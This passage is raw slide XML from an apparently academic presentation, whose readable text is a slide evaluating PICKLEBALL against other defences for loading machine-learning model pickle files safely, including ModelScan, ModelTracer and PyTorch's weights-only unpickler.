        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="963" name="Google Shape;963;p78"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3801276" y="2294637"/>
            <a:ext cx="298800" cy="287400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F4CCCC"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="9050">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="43425" lIns="43425" spcFirstLastPara="1" rIns="43425" wrap="square" tIns="43425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="665"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="964" name="Google Shape;964;p78"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3801276" y="2294631"/>
            <a:ext cx="298880" cy="287347"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="965" name="Google Shape;965;p78"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3859896" y="2317214"/>
            <a:ext cx="415605" cy="415605"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="966" name="Google Shape;966;p78"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3800862" y="3533187"/>
            <a:ext cx="299700" cy="288000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="A4C2F4"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="9075">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="43550" lIns="43550" spcFirstLastPara="1" rIns="43550" wrap="square" tIns="43550">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="666"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="967" name="Google Shape;967;p78"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3800868" y="3533181"/>
            <a:ext cx="299635" cy="288091"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="968" name="Google Shape;968;p78"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3692555" y="3448829"/>
            <a:ext cx="516250" cy="456764"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="969" name="Google Shape;969;p78"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3801276" y="2904225"/>
            <a:ext cx="298880" cy="287347"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="970" name="Google Shape;970;p78"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3801276" y="2904237"/>
            <a:ext cx="298800" cy="287400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F4CCCC"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="9050">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="43425" lIns="43425" spcFirstLastPara="1" rIns="43425" wrap="square" tIns="43425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="665"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="971" name="Google Shape;971;p78"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3801276" y="2904231"/>
            <a:ext cx="298880" cy="287347"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="972" name="Google Shape;972;p78"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3859896" y="2926814"/>
            <a:ext cx="415605" cy="415605"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="973" name="Google Shape;973;p78"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3800862" y="4142787"/>
            <a:ext cx="299700" cy="288000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="A4C2F4"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="9075">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="43550" lIns="43550" spcFirstLastPara="1" rIns="43550" wrap="square" tIns="43550">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="666"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="974" name="Google Shape;974;p78"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3800868" y="4142781"/>
            <a:ext cx="299635" cy="288091"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="975" name="Google Shape;975;p78"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3692555" y="4058429"/>
            <a:ext cx="516250" cy="456764"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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79" name="Shape 979"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="980" name="Google Shape;980;p79"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629175" y="0"/>
            <a:ext cx="8514900" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Evaluation: P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>ICKLE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>ALL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> Creates Secure and Usable Policies</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="981" name="Google Shape;981;p79"/>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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="982" name="Google Shape;982;p79"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="952500" y="1618725"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{11C30A3B-6D4B-4216-B4AD-653BF54A5768}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1441700"/>
                <a:gridCol w="1157000"/>
              </a:tblGrid>
              <a:tr h="381000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>Tool</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:t/>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>Type</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
              <a:tr h="381000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>ProtectAI ModelScan</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>Scanner</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="550975">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>ModelTracer</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>Scanner</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="381000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>Weights-Only Unpickler</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>Restricted Loader</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="381000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Inter Light"/>
                          <a:ea typeface="Inter Light"/>
                          <a:cs typeface="Inter Light"/>
                          <a:sym typeface="Inter Light"/>
                        </a:rPr>
                        <a:t>P</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Inter Light"/>
                          <a:ea typeface="Inter Light"/>
                          <a:cs typeface="Inter Light"/>
                          <a:sym typeface="Inter Light"/>
                        </a:rPr>
                        <a:t>ICKLE</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Inter Light"/>
                          <a:ea typeface="Inter Light"/>
                          <a:cs typeface="Inter Light"/>
                          <a:sym typeface="Inter Light"/>
                        </a:rPr>
                        <a:t>B</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Inter Light"/>
                          <a:ea typeface="Inter Light"/>
                          <a:cs typeface="Inter Light"/>
                          <a:sym typeface="Inter Light"/>
                        </a:rPr>
                        <a:t>ALL</a:t>
                      </a:r>
                      <a:endParaRPr sz="1000">
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>Restricted Loader</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="983" name="Google Shape;983;p79"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4412900" y="2337050"/>
            <a:ext cx="4457400" cy="362700"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B9D8EB"/>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a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>Static analysis tool integrated on Hugging Face.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="984" name="Google Shape;984;p79"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4412900" y="2931975"/>
            <a:ext cx="4457400" cy="362700"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B9D8EB"/>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a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>Dynamic tracing tool proposed by Casey et al. [13].</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="985" name="Google Shape;985;p79"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4412900" y="3498600"/>
            <a:ext cx="4457400" cy="362700"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B9D8EB"/>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a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>Restricted loader enabled by default in PyTorch.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="986" name="Google Shape;986;p79"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2394200" y="898725"/>
            <a:ext cx="4736100" cy="362700"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B9D8EB"/>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chemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
